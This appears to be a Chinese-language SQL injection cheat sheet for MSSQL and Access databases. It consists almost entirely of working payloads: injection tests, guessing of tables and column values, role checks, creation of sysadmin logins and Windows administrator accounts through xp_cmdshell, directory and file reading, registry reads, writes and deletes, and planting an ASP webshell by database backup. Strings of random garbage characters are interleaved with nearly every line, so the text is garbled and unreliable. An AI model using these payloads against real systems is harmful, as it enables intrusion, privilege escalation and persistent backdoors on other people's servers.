1.判断是否有注入;and 1=1 ;and 1=2 or�b_"Q�w�
2.初步判断是否是mssql ;and user>0 ~K@'�+�5Pc
2�WG>, 4W2
3.注入参数是字符'and [查询条件] and ''=' .YuJ��JJ�v
"�Wx]RN��:
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ~g.$|^,.O/
5xL~`-IA&v
5.判断数据库系统 0Lb��4'25.
Jec'�`�,Y�
;and (select count(*) from sysobjects)>0 mssql ({o'd=n��O
�l�#�n,Fg3
;and (select count(*) from msysobjects)>0 access R4-~j��gzx
QE7V.
>J_p
c*~]zR>s!
13Lr���}M&
6.猜数据库 ;and (select Count(*) from [数据库名])>0
g��e8/``=
63A��}T�BC
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �K<>sOWZ'S
@e{^`\�l=<
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ^a�W�
Z!gi
t45Z@hmc�W
9.(1)猜字段的ascii值(access) 0�bo/XUp�i
|ZQ@fmvL/p
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ��X]�'7Ov�
,~._}E&�9I
(2)猜字段的ascii值(mssql) ]LM-@G+J�z
�7�x<i :x3
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 j�Rat��m.N
{26ON�a#i�
10.测试权限结构(mssql) �bc�upo:�N
~��zw]�5|�
��8,uB8C9�
�A�=
w9�V�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Si~vD�Q7"�
��)R�cL/n
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ���]~3��U
V�(E/'��DR
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ccL�~#c0P7
3'X.}�>o��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- h�;0S��%ZC
/soKucN"�h
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �+$Rt+S BD
)���(@Hd�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �7�hc��Nf,
/J�u;�MeE9
;and 1=(select IS_MEMBER('db_owner'));-- zL���J/5&�
��wiBVuj�#
Ot`VR��&}
@�K!�&q��w
11.添加mssql和系统的帐户 Y�3=_ec�3w
<���wAFy>7
;exec master.dbo.sp_addlogin username;-- Q�Nl'ZB�\�
;exec master.dbo.sp_password null,username,password;-- o�qeS�G.1�
}C|d��yyr�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- )Dz+X9;g+�
�F,'exu��Z
;exec master.dbo.xp_cmdshell 'net user username password b3V��S\[�p
-ne���Kuj
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- uAWM��\�?
��=xS+��5(
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ���`Ry]y"K
Lup�kr�xV�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �:Q@&5!]>d
x|5k<CiA�
�b4pm�_�Um
=ha{�Ziryo
12.(1)遍历目录 *�2X0^H|dS
3�=L.uX�Vb
;create table dirs(paths varchar(100), id int) +j4"!�:N}B
'f?$�"U JF
;insert dirs exec master.dbo.xp_dirtree 'c:\' RZCq�{|�L
SZXY/~=h�
;and (select top 1 paths from dirs)>0 pn^ d]rou?
rX1QMR��7?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) J^g!++|2�P
|.�3DD�"�*
S)/_mu���P
&sd}ul�Eg`
(2)遍历目录 ��qQH]`#P�
\~�_9G{�2?
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �f@c`�8L@g
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ~b�2�wBs)r
,zT�y?O��Q
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 nxl[d\ap+n
VZl6t;��cn
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Qg<(u?7N��
.?hP7;h�hI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 1&U>�,;]*�
��cx0*��X*
B�G�u?<bET
a �7,�C>%I
13.mssql中的存储过程 j ku}QM^��
g">� {9�YE
xp_regenumvalues 注册表根键, 子键 ����`F��C(
�Kc^;vT�>3
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 LoGVwRmoC�
+PuPO9jKO@
xp_regread 根键,子键,键值名 #&�7}-"�Nd
0a���"�c2J
;exec xp_regread w�4d-��-[Q
[2{1b`���e
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ^�R@j=_8�}
wg]j�+�r�@
xp_regwrite 根键,子键, 值名, 值类型, 值 yYH�0v7vx+
�$
<#KA3o\
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 8��M�`#pN^
HF�.^�ysI�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 E2{F�K�)qT
�
({=gw9f
xp_regdeletevalue 根键,子键,值名 >lI�k�9�|�
�PxS8 �n?y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !dC<4qZ\C�
x3"�#�POp
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 }x��
wu*Zx
��B[��4KX
�>L
0_�dvr
h^o�{�@/2�
14.mssql的backup创建webshell E3�iW-B8u8
:B:"N��yPA
use model �����^:Gie
n= u�&uqA*
create table cmd(str image); &sL&�\+=<(
�?28�N�� ^
insert into cmd(str) values (''); M�%0C�_=zg
JQ@�E�>o7_
backup database model to disk='c:\l.asp'; K]9�"_UnN
k4�[|'Dk�?
�d�$�Pab*�
!�f+H,�]D"
15.mssql内置函数 �9am�aL�~m
K]0JC/R6(@
;and (select @@version)>0 获得Windows的版本号 5�)�MS~ii�
}�d�d8N5b�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa #hsx#x|�|�
F�;<xnC{[
;and (select user_name())>0 爆当前系统的连接用户 CL�J��;<��
TBT:/�Vfun
;and (select db_name())>0 得到当前连接的数据库 =�{�x�E!"
���`p�;I}�
AQiw���ugs
eXf22�;L�z
16.简洁的webshell ���$
.
9V&
��>\Ww;1yV
use model O���6G0���
] A+?EE2/�
create table cmd(str image); )(384�@'"u
I]EbodAyZ,
insert into cmd(str) values (''); 07^�iP>�?
ptZ <o��w&
backup database model to disk='g:\wwwtest\l.asp';
